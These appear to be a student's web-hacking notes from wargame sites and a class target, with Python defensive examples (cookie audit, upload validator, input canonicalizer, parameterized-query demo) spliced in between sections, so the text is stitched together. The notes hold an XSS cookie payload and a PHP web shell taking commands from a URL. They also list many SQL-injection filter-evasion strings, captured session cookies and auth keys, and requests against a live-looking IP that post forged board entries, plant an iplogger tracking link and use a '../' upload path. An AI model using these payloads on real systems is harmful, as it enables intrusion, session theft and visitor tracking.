12.16~
Pwnable.kr
PHPSESSID=tdl21lkc7116mthb1do16be0m1
Session hijacking with Burp Suite
After setting the browser's proxy, capture the PHPSESSID inside the cookie
Paste the copied SESSID into the intercepted GET request and send it
Cross-site scripting (XSS)
Uses the input fields of a web page
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
IFRAME event-based (filter evasion)
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
Reflected XSS???
With a GET request, insert the script after the ?
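The session-hijacking and `document.cookie` payloads above both depend on the session cookie being visible to the network and to script. The following Python is an added example, not part of the original notes: it audits a response's Set-Cookie headers for the attributes that close those two paths. The header values are constructed, and the list of session-cookie name prefixes is an assumption.

```python
"""Audit Set-Cookie headers for the attributes that limit session theft.

Added example, not part of the original notes. The headers below are
constructed; the cookie names follow the ones seen in the notes (PHPSESSID,
ASPSESSIONID*, JSESSIONID) but the values are made up. The prefix list is
an assumption about which cookies carry a server-side session.
"""
from typing import Dict, List

SESSION_PREFIXES = ("PHPSESSID", "ASPSESSIONID", "JSESSIONID")

# Finding code -> what it means for the attacks described above
EXPLANATION = {
    "no-httponly": "readable via document.cookie, so an XSS payload can exfiltrate it",
    "no-secure": "sent over plain HTTP, so anyone on the path (e.g. an intercepting proxy) can read it",
    "no-samesite": "attached to cross-site requests; set SameSite=Lax or Strict",
}


def parse_set_cookie(header: str) -> Dict[str, str]:
    """Split one Set-Cookie value into name, value and lower-cased attributes."""
    parts = [p.strip() for p in header.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")
    cookie = {"name": name.strip(), "value": value.strip()}
    for attr in parts[1:]:
        key, _, val = attr.partition("=")
        cookie[key.strip().lower()] = val.strip() or "true"
    return cookie


def is_session_cookie(name: str) -> bool:
    return name.upper().startswith(SESSION_PREFIXES)


def audit_cookie(header: str) -> List[str]:
    """Return finding codes for one Set-Cookie header; an empty list means no issue."""
    cookie = parse_set_cookie(header)
    if not is_session_cookie(cookie["name"]):
        return []                        # only session cookies are audited here
    findings = []
    if "httponly" not in cookie:
        findings.append("no-httponly")
    if "secure" not in cookie:
        findings.append("no-secure")
    if cookie.get("samesite", "").lower() not in ("lax", "strict"):
        findings.append("no-samesite")
    return findings


def audit_response(headers: List[str]) -> Dict[str, List[str]]:
    """Map each session cookie name to its findings, skipping non-session cookies."""
    return {parse_set_cookie(h)["name"]: audit_cookie(h)
            for h in headers if is_session_cookie(parse_set_cookie(h)["name"])}


# Constructed sample: what a PHP app, an ASP app and a hardened Java app might send
SAMPLE_HEADERS = [
    "PHPSESSID=EXAMPLEPHPSESSION0001; path=/",
    "ASPSESSIONIDEXAMPLE=EXAMPLEASPSESSION0001; path=/",
    "JSESSIONID=EXAMPLEJSESSION0001; Path=/; Secure; HttpOnly; SameSite=Lax",
    "theme=dark; Path=/",
]

if __name__ == "__main__":
    for name, findings in audit_response(SAMPLE_HEADERS).items():
        for code in findings:
            print(f"{name}: {code}: {EXPLANATION[code]}")
```

Run against real responses, the first two sample cookies are the shape of the PHPSESSID captured above: readable by an `alert(document.cookie)` payload and by an intercepting proxy. HttpOnly stops the first, Secure (with HTTPS) the second; neither replaces regenerating the session id at login.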
Directory listing
Finding out the directory structure of a web page (?)
Viewing the page source (e.g. with Inspect) reveals things like <script src = "./script/global.js"></script>
Web shell
If the file upload directory is ./upload
Upload an eee.php that calls system($_GET('eee'))
14.36.28.173/upload/eee.php?eee='command'
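The web shell above only works because the upload handler stores whatever name and content the client sends into a directory the server will execute. The Python below is an added example, not from the original notes or the lab application: a server-side check that rejects a `.php` upload, a double extension such as `eee.php.jpg`, a path component, or image bytes with script markers appended, and that picks the stored file name itself. The allowed-type table and the sample files are constructed assumptions.

```python
"""Server-side validation for an upload directory such as ./upload.

Added example, not from the original notes. Assumptions: the application
only needs to accept images and PDFs; the magic-byte table and the
constructed sample files below are illustrative.
"""
import os
import secrets
from typing import Tuple

# extension -> required leading bytes (magic numbers)
ALLOWED = {
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".png": b"\x89PNG\r\n\x1a\n",
    ".pdf": b"%PDF-",
}
# Markers of server-side script inside an otherwise valid-looking file
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<%", b"<script")


def validate_upload(filename: str, data: bytes) -> Tuple[bool, str]:
    """Return (accepted, reason). Everything not explicitly allowed is rejected."""
    base = os.path.basename(filename)
    if base != filename or not base or base.startswith("."):
        return False, "path component or hidden name"
    stem, ext = os.path.splitext(base)
    ext = ext.lower()
    if ext not in ALLOWED:
        return False, f"extension {ext or '(none)'} not allowed"
    if "." in stem:                       # eee.php.jpg style double extensions
        return False, "multiple extensions"
    if not data.startswith(ALLOWED[ext]):
        return False, "content does not match extension"
    if any(marker in data for marker in SCRIPT_MARKERS):
        return False, "embedded script marker"
    return True, "ok"


def stored_name(filename: str) -> str:
    """Name chosen by the server: random token plus the validated extension."""
    ext = os.path.splitext(filename)[1].lower()
    return secrets.token_hex(16) + ext


# Constructed sample uploads
SAMPLES = {
    "eee.php": b"<?php echo 1; ?>",
    "eee.php.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 8,
    "../eee.jpg": b"\xff\xd8\xff\xe0",
    "photo.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 8,
    "poly.jpg": b"\xff\xd8\xff\xe0<?php echo 1; ?>",
}

if __name__ == "__main__":
    for name, content in SAMPLES.items():
        ok, reason = validate_upload(name, content)
        print(f"{name!r}: {'accepted as ' + stored_name(name) if ok else 'rejected: ' + reason}")
```

The check is an allow-list, so the `eee.php` upload above is refused on the extension alone; the content and marker checks cover the polyglot case where a valid image header is followed by script. The upload directory itself should additionally be served without script execution, which no file-name check can substitute for.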
Suninatas.com
Webhacking.kr
Suninatas Lv.6
1) Case variation
union select password from member where id='ireoa'--
UnION seLEct password ForM member WhErE id='ireoa'--
2) Whitespace bypass
/**/ %0a %09 ()
3) = bypass
union select password from member where username = 'ireoa'--
union select password from member where username like 'ireoa'--
4) URL encoding
'%2f%2a*/union%2f%2a*/select%2f%2a*/password%2f%2a*/form%2f%2a*/member%2f%2a*/where%2f%2a*/username%2f%2a*/lie%2f%2a*/
'ireoa'--
Sometimes this fails, so encode it twice
'252f%2f2a*/union252f%2f2a*/select252f%2f2a*/password252f%2f2a*/from252f%2f2a*/member252f%2f2a*/where252f%2f2a*/username252f%2f2a*/
like252f%2f2a*/'ireoa'--
5) Unicode encoding
1) '
%u0027
%u02b9
%u02bc
%u02c8
%u2032
%uff07
%c0%27
%c0%a7
%c0%80%a7
2)-
%u005f
%uff3f
%c0%2d
%c0%ad
%e0%80%ad
3)/
%u2215
%u2044
%uff0f
%c0%2f
%c0%af
%e0%80%af
4)(
%u0028
%uff08
%c0%28
%c0%a8
%e0%80%a8
5))
%u0029
%uff09
%c0%29
%c0%a9
%e0%80%a9
6)*
%u002a
%uff0a
%c0%2a
%c0%aa
%e0%80%aa
7) space
%u0020
%uff00
%c0%20
%c0%a0
%e0%80%a0
6) Using dynamic query execution
MS-SQL : EXEC('SELECT password FROM member')
Oracle :
DECLARE pw VARCHAR2(1000);
BEGIN
EXECUTE IMMEDIATE 'SELECT password FROM member' INTO pw;
DBMS_OUTPUT.PUT_LINE(pw);
END;
7) SELECT
Oracle : 'SEL'||'ECT'
MS-SQL : 'SEL'+'ECT' CHAR(93)+CHAR(69)+CHAR(76)+CHAR(69)+CHAR(67)+CHAR(84)
MySQL : 'SEL''ECT'
In MS-SQL the + must be encoded as %2b; in MySQL the spaces must be encoded as %20
In Oracle, REVERSE, TRANSLATE, REPLACE and SUBSTR are also possible
8) NULL byte bypass
Used to bypass IPS/IDS: web firewalls and IDS/IPS are mostly written in native code, so they only inspect the string up to the null byte, which makes bypass possible
%00' UNION SELECT password FROM member WHERE username='ireoa'--
9) Consecutive-keyword bypass
SELSELECTECT: the filter strips the inner SELECT (shown in red), and the remaining SELECT (blue) survives and can be used
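Every trick in items 1 to 9 above works because the filter and the database see different strings. The Python below is an added example, not from the original notes: it folds a request parameter into one canonical form (repeated URL decoding, IIS-style `%uXXXX`, overlong UTF-8 such as `%c0%a7`, fullwidth characters, null bytes, `/**/` and `%0a`/`%09` spacers, case) before any keyword matching, and contrasts the single-pass keyword stripping that `SELSELECTECT` defeats with a fixed-point version. The `HOMOGLYPHS` map, the `SQLI_PATTERNS` list and the sample strings are assumptions; this is a detection aid, and the query itself should still be parameterized.

```python
"""Canonicalize a request parameter before matching it against SQL keywords.

Added example, not from the original notes. It undoes the evasions listed
above so that one lower-case form is inspected. HOMOGLYPHS and
SQLI_PATTERNS are assumptions for illustration.
"""
import re
import unicodedata
from typing import List, Tuple
from urllib.parse import unquote_to_bytes

# Look-alikes from the notes' unicode list that NFKC does not fold (assumption: treat as equal)
HOMOGLYPHS = {"\u02b9": "'", "\u02bc": "'", "\u02c8": "'", "\u2032": "'",
              "\u2215": "/", "\u2044": "/"}
KEYWORDS = ("union", "select", "from", "where", "like", "exec", "execute")
SQLI_PATTERNS = [
    r"\bunion\b.*\bselect\b",
    r"\bselect\b.*\bfrom\b",
    r"'\s*or\s*\S+\s*(=|like)\s*\S+",   # ' or 1=1  /  ' or 1 like 1
    r"\bexec(ute)?\b",
]


def lenient_utf8(raw: bytes) -> str:
    """Decode like a permissive decoder: overlong forms (C0 A7, E0 80 A7)
    yield the same code point as the plain byte 0x27."""
    out, i = [], 0
    while i < len(raw):
        b = raw[i]
        if b < 0x80:
            out.append(chr(b)); i += 1; continue
        if b >= 0xF0:
            n, cp = 3, b & 0x07
        elif b >= 0xE0:
            n, cp = 2, b & 0x0F
        elif b >= 0xC0:
            n, cp = 1, b & 0x1F
        else:                               # stray continuation byte
            out.append("\ufffd"); i += 1; continue
        tail = raw[i + 1:i + 1 + n]
        if len(tail) < n or any(t & 0xC0 != 0x80 for t in tail):
            i += 1; continue                # C0 27: drop the lead, keep 0x27 visible
        for t in tail:
            cp = (cp << 6) | (t & 0x3F)     # overlong C0 A7 -> 0x27, E0 80 A7 -> 0x27
        out.append(chr(cp) if cp <= 0x10FFFF else "\ufffd")
        i += 1 + n
    return "".join(out)


def decode_layer(s: str) -> str:
    """One decoding pass: %uXXXX, then %XX bytes through the lenient decoder."""
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return lenient_utf8(unquote_to_bytes(s))


def canonicalize(value: str, max_layers: int = 3) -> Tuple[str, List[str]]:
    """Return (canonical form, findings). Decoding repeats while it still
    changes the string, so double encoding (%2527) is undone as well."""
    findings: List[str] = []
    s = value
    for _ in range(max_layers):
        decoded = decode_layer(s)
        if decoded == s:
            break
        s = decoded
    if "\x00" in s:
        findings.append("null-byte")        # keep inspecting past the NUL, unlike a C string
        s = s.replace("\x00", "")
    s = unicodedata.normalize("NFKC", s)    # fullwidth quote/slash/parens/star -> ASCII
    s = "".join(HOMOGLYPHS.get(ch, ch) for ch in s)
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)   # /**/ used as a space
    s = re.sub(r"\s+", " ", s).strip().lower()      # %0a, %09, runs of spaces
    return s, findings


def looks_like_sqli(value: str) -> Tuple[bool, str, List[str]]:
    canon, findings = canonicalize(value)
    findings += [f"pattern:{p}" for p in SQLI_PATTERNS if re.search(p, canon)]
    return bool(findings), canon, findings


def strip_keywords_once(s: str) -> str:
    """The filter that SELSELECTECT defeats: a single pass of keyword removal."""
    for kw in KEYWORDS:
        s = re.sub(kw, "", s, flags=re.I)
    return s


def strip_keywords_fixpoint(s: str) -> str:
    """Repeat until nothing changes (rejecting the request outright is better still)."""
    while True:
        stripped = strip_keywords_once(s)
        if stripped == s:
            return s
        s = stripped


if __name__ == "__main__":
    for sample in ("UnION seLEct password ForM member WhErE id='ireoa'--",
                   "%c0%a7%20or%201%20like%201--", "%2527%2520or%25201%253d1--", "ireoa"):
        print(sample, "->", looks_like_sqli(sample))
    print(strip_keywords_once("SELSELECTECT"), "|", strip_keywords_fixpoint("SELSELECTECT"))
```

The decode loop stops as soon as a pass changes nothing, which is what makes the double-encoded form of item 4 collapse to the same text as the single-encoded one; the overlong and fullwidth forms of item 5 collapse to plain `'` and `/`. Logging the canonical form next to the raw parameter also gives a reviewer something readable when triaging alerts.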
10) Truncation attack
Assume the following two conditions:
1) Single quotes (') are replaced with ('')
2) Only 10 characters are accepted
Then if I attack with aaaaaaaaa',
the first condition turns it into aaaaaaaaa'', but only 10 characters are passed on,
so the aaaaaaaaa' I wanted goes through.
select * from member where username='aaaaaaaaa'' AND password = ''
If or 1=1-- is put into password,
select * from member where username='aaaaaaaaa'' AND password = 'or 1=1--'
and the bypass succeeds
' or 1 like 1--
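The two conditions above can be run end to end against SQLite to show exactly where the order of operations goes wrong. The following Python is an added example, not from the original notes: it builds the query both ways (escape then truncate, truncate then escape) and compares both with a bound parameter that enforces the length limit explicitly. The `member` table and its one row are constructed.

```python
"""The two conditions above, run against SQLite: escape-then-truncate versus
truncate-then-escape versus a bound parameter. Added example, not from the
original notes; the member table and its single row are constructed.
"""
import sqlite3

MAX_LEN = 10   # condition 2: only 10 characters are accepted


def escape(s: str) -> str:
    return s.replace("'", "''")   # condition 1: ' becomes ''


def build_query_vulnerable(username: str, password: str) -> str:
    """Escape first, then cut to MAX_LEN: the doubled quote can be cut in half."""
    u = escape(username)[:MAX_LEN]
    p = escape(password)[:MAX_LEN]
    return f"select * from member where username='{u}' AND password = '{p}'"


def build_query_truncate_first(username: str, password: str) -> str:
    """Cut to MAX_LEN first, then escape, so every quote in the output is doubled."""
    u = escape(username[:MAX_LEN])
    p = escape(password[:MAX_LEN])
    return f"select * from member where username='{u}' AND password = '{p}'"


def setup_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("create table member (username text, password text)")
    conn.execute("insert into member values ('ireoa', 's3cret')")   # constructed row
    return conn


def login_concat(conn: sqlite3.Connection, builder, username: str, password: str) -> bool:
    """Authenticate with a concatenated query produced by `builder`."""
    try:
        return conn.execute(builder(username, password)).fetchone() is not None
    except sqlite3.Error:
        return False


def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Enforce the length limit explicitly, then bind; quotes are data, never syntax."""
    if len(username) > MAX_LEN or len(password) > MAX_LEN:
        return False                       # reject instead of silently truncating
    row = conn.execute(
        "select 1 from member where username = ? and password = ?",
        (username, password),
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    conn = setup_db()
    user, pw = "aaaaaaaaa'", "or 1=1--"    # the input pair from the notes above
    print(build_query_vulnerable(user, pw))
    print("escape-then-truncate:", login_concat(conn, build_query_vulnerable, user, pw))
    print("truncate-then-escape:", login_concat(conn, build_query_truncate_first, user, pw))
    print("parameterized:", login_parameterized(conn, user, pw))
```

The first query string printed is exactly the one written out above, with the escaped quote cut back to a lone quote. Truncating before escaping fixes that specific ordering bug, but the bound-parameter version is the one to ship: the length check becomes an explicit rejection, and no combination of quotes or comment markers in the input can reach the SQL parser as syntax.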
auth_key is suninatastopofworld!
GET /Part_one/web06/view.asp?idx=3&num=3&passcode=wkdrnlwnd HTTP/1.1
Host: suninatas.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://suninatas.com/Part_one/web06/Serect.asp
Accept-Encoding: gzip, deflate, sdch
Accept-Language: ko,en-US;q=0.8,en;q=0.6,zh;q=0.4
Cookie: ASPSESSIONIDQCSSACCS=COLCOECAFICBMCGEBCEFNBOH; auth%5Fkey=%3F%3F%3F%3F%3F
Connection: close
auth%5key=65038b0559e459420aa2d23093d01e4a
<form method="post" name="KEY_HINT" action="Rome's First Emperor">
9384
Source: <http://suninatas.com/Part_one/web25/web25.asp>
"http://www.suninatas.com/Part_one/web25/chk_key.asp?id=" + localEditable1.toString() + "&pw=" + localEditable2.toString() + "&Name=" + str1.toString() + "&Number=" + str3.toString()
ASPSESSIONIDQCSSACCS=JHMEOECALBANBMFLKABEDEGB
Where files uploaded under "Business Partnership" are saved,
and where the data-room files are stored:
14.36.28.181/kitri/uploadfile/
Files can be uploaded and downloaded with Burp Suite
loginProc.web
<script type="text/javascript">
var chk = "IDFAIL";
if(chk == 'SUCCESS') {
} else if(chk == 'IDFAIL') {
alert("아이디 또는 비밀번호를 잘못 입력하셨습니다.");
// alert("아이디가 존재하지 않습니다.");
} else if(chk == 'PWDFAIL') {
alert("아이디 또는 비밀번호를 잘못 입력하셨습니다.");
// alert("비밀번호를 확인하시기 바랍니다.");
} else if(chk == 'MEMFAIL') {
alert("기업회원 승인 대기중입니다.");
} else if(chk == 'SVCFAIL') {
alert("로그인이 필요한 서비스입니다.");
}
location.href="/academy/main/main.web";
</script>
http://14.36.28.181/uploadfile/
/uploadfile/admin_log_chk.php?
/*
 * File download handler
 * @param String inSiteDiv  site division (kitri, academy, admin)
 * @param String inFileNm   file name
 */
// File download
function file_download(inSiteDiv, inFileNm){
    var indir = "/uploadfile/";
    var inUrl = "/" + inSiteDiv + "/file/download.web";
    console.log(">>>>>>>>>>>>> inUrl ::: " + inUrl);
    console.log(">>>>>>>>>>>>> indir ::: " + indir);
    var inputs1 = '<input type="hidden" name="dir" value="'+ indir +'" />';
    var inputs2 = '<input type="hidden" name="filename" value="'+ inFileNm +'" />';
    var inputs3 = '<input type="hidden" name="siteDiv" value="'+ inSiteDiv +'" />';
    jQuery('<form action="' + inUrl + '" method="get">'+inputs1+inputs2+inputs3+'</form>')
        .appendTo('body').submit().remove();
    return false;
}
Source: <http://14.36.28.181/static/js/common.js>
Open ports: 21, 80, 1723, 2222, 3306, 3389, 8009, 8080
{"success":"true","jsonData":{"condition":{"lv_pkid":"8823"},"dataInfo":{"SUBJECT":" ","FILE1_YN":"N","NAME":"관리자","WDATE":"2014-05-22","FILE4_YN":"N","PKID":"8823","FILE_02":"","GONG_CHK":"n","FILE_01":"","FILE_04":"","FILE_03":"","FILE2_YN":"N","CONTENT":>","FILE5_YN":"N","VISITED":6,"FILE":"","FILE3_YN":"N"}}}
{"success":"true","jsonData":{"condition":{"lv_pkid":"12195"},"dataInfo":{"SUBJECT":"OHH SHITTT!! MJ is SMART!! ","FILE1_YN":"N","NAME":"jkh","WDATE":"2016-12-22","FILE4_YN":"N","PKID":"15995","FILE_02":"","GONG_CHK":"y","FILE_01":"","FILE_04":"","FILE_03":"","FILE2_YN":"N","CONTENT":"하핳ㅎㅎ","FILE5_YN":"N","VISITED":0,"FILE":"","FILE3_YN":"N"}}}
POST /academy/proc/board/tidings/noticeAcaView.json HTTP/1.1
Host: 14.36.28.181
Content-Length: 26
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://14.36.28.181
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: ko,en-US;q=0.8,en;q=0.6,zh;q=0.4
Cookie: JSESSIONID=88E59E12964169F55787B94FC89B963F
Connection: close
hd_site_div=C&lv_pkid=8823
POST /academy/proc/board/contact/qna_insert.json HTTP/1.1
Host: 14.36.28.181
Content-Length: 116
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://14.36.28.181
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: ko,en-US;q=0.8,en;q=0.6,zh;q=0.4
Cookie: JSESSIONID=6E6FF4955D3DB40844248347A4306972
Connection: close
hd_site_div=C&hd_mnu_idx=null&boardid=5&bd_qna_div=3&qna_cate=3&bd_subject=333&bd_qna_wrt=333&ir1=333&bd_qna_pwd=333
POST /academy/proc/board/contact/qna_insert.json HTTP/1.1
Host: 14.36.28.181
Content-Length: 337
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://14.36.28.181
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: ko,en-US;q=0.8,en;q=0.6,zh;q=0.4
Cookie: JSESSIONID=A2E9D2F866AA4E3D3C204AC9E2AE60A1
Connection: close
hd_site_div=C&hd_mnu_idx=null&boardid=55&bd_qna_div=3&qna_cate=3&bd_subject=333&bd_qna_wrt=333&ir1=333&bd_qna_pwd=333
POST /academy/proc/board/tidings/selectNewsList.json HTTP/1.1
Host: 14.36.28.181
Content-Length: 54
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://14.36.28.181
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://14.36.28.181/academy/tidings/news_list.web?
Accept-Encoding: gzip, deflate
Accept-Language: ko,en-US;q=0.8,en;q=0.6,zh;q=0.4
Cookie: JSESSIONID=A2E9D2F866AA4E3D3C204AC9E2AE60A1
Connection: close
hd_site_div=C&boardid=8&page_num=0&sel_such=&txt_such=
http://14.36.28.181/academy/tidings/news_list.web?
<a href="http://iplogger.org/28yF4.gif">이상해씨</a>
{"success":"true","jsonData":{"page_string":"<a href='#' class='first_bt' onclick=paging(0)><img alt=\"처음\" src=\"\/static\/images\/kitri\/sub\/board\/pge_first_btn.gif\"><\/a><a class='crnt'>1<\/a><a href='#' onclick=paging(1)>2<\/a><a href='#' onclick=paging(2)>3<\/a><a href='#' class='last_bt' onclick=paging(2)><img alt=\"마지막\" src=\"\/static\/images\/kitri\/sub\/board\/pge_last_btn.gif\"><\/a>","condition":{"sel_such":"1","txt_such":"","page_block":10,"page_num_block":0},"selectList":[{"SUBJECT":"Windows Server 2008 바이블","WDATE":"2014-07-11","WNAME":"찰리러셀外","DIVNM":"교재","PKID":"196","FILE":"b8.jpg","ROWNO":23,"WCOMPANY":"정보문화사"},{"SUBJECT":"스프링 시큐리티 3","WDATE":"2014-07-11","WNAME":"피터뮬라리","DIVNM":"교재","PKID":"195","FILE":"b7.jpg","ROWNO":22,"WCOMPANY":"위키북스"},{"SUBJECT":"정보보안 개론과 실습(시스템 해킹과 보안)","WDATE":"2014-07-11","WNAME":"양대일","DIVNM":"교재","PKID":"194","FILE":"b6.jpg","ROWNO":21,"WCOMPANY":"한빛미디어"},{"SUBJECT":"하둡 완벽 가이드","WDATE":"2014-07-11","WNAME":"톰화이트","DIVNM":"교재","PKID":"193","FILE":"b5.jpg","ROWNO":20,"WCOMPANY":"한빛미디어"},{"SUBJECT":"CentOS 리눅스 구축관리 실무","WDATE":"2014-07-11","WNAME":"김태용","DIVNM":"교재","PKID":"192","FILE":"b4.jpg","ROWNO":19,"WCOMPANY":"수퍼유저코리아"},{"SUBJECT":"자바 웹 프로그래밍 ","WDATE":"2014-07-11","WNAME":"황희정","DIVNM":"교재","PKID":"191","FILE":"b3.jpg","ROWNO":18,"WCOMPANY":"한빛아카데미"},{"SUBJECT":"JAVA의 정석","WDATE":"2014-07-11","WNAME":"남궁성","DIVNM":"교재","PKID":"190","FILE":"b2.jpg","ROWNO":17,"WCOMPANY":"도우출판"},{"SUBJECT":"오라클 11G + PL\/SQL 입문","WDATE":"2014-07-11","WNAME":"성윤정","DIVNM":"교재","PKID":"189","FILE":"b1.jpg","ROWNO":16,"WCOMPANY":"대림"},{"SUBJECT":"BackTrack 5 Wireless Penetration Testing ","WDATE":"2014-07-11","WNAME":"비벡라마찬","DIVNM":"교재","PKID":"188","FILE":"m8.jpg","ROWNO":15,"WCOMPANY":"에이콘출판"},{"SUBJECT":"최신 경향에 맞춘 정보보호전문가의 CISSP노트","WDATE":"2014-07-11","WNAME":"허종오外","DIVNM":"교재","PKID":"187","FILE":"m7.jpg","ROWNO":14,"WCOMPANY":"인포더북스"}]}}
{"SUBJECT":"이상해씨와 함께하는 패킷조작","WDATE":"2016-12-23","WNAME":"한가놈과 로켓단 포함 다수","DIVNM":"교재","PKID":"197","FILE":"../kitri/uploadfile/ecec.jpg","ROWNO":24,"WCOMPANY":"KITRI NCS 2기"}
POST /academy/proc/board/archives/textbook_list.json HTTP/1.1
Host: 14.36.28.181
Content-Length: 61
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://14.36.28.181
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://14.36.28.181/academy/archives/01_total_rental.web?
Accept-Encoding: gzip, deflate
Accept-Language: ko,en-US;q=0.8,en;q=0.6,zh;q=0.4
Cookie: JSESSIONID=C98CA2626462B282822339DE4188BAAD
Connection: close
hd_site_div=C&hd_mnu_idx=null&page_num=0&sel_such=0&txt_such=